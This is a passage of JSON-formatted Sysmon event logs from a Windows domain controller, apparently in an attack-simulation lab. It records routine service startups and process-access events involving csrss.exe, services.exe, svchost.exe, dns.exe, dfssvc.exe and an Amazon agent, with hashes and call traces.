{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.903\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.903","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.903\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.903","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.911\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.911","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.912\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2592\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.912","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2592","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.908\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001050C20200}\r\nProcessId: 2352\r\nImage: C:\\Windows\\System32\\dfssvc.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Distributed File System Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfssvc.exe\r\nCommandLine: C:\\Windows\\system32\\dfssvc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.908","ProcessGuid":"{41C8662E-1F73-5F25-0000-001050C20200}","Image":"C:\\Windows\\System32\\dfssvc.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Distributed File System Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfssvc.exe","CommandLine":"C:\\Windows\\system32\\dfssvc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.917\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 952\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.917","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"952","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.909\r\nProcessGuid: {41C8662E-1F73-5F25-0000-0010B6C20200}\r\nProcessId: 2156\r\nImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nFileVersion: 1.0\r\nDescription: xenagent\r\nProduct: XENIFACE\r\nCompany: Amazon Inc.\r\nOriginalFileName: xenagent.exe\r\nCommandLine: \"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.909","ProcessGuid":"{41C8662E-1F73-5F25-0000-0010B6C20200}","Image":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","FileVersion":"1.0","Description":"xenagent","Product":"XENIFACE","Company":"Amazon Inc.","OriginalFileName":"xenagent.exe","CommandLine":"\"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.918\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.918","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.918\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B3410100}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.918","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B3410100}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.918\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B3410100}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.918","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B3410100}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.920\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 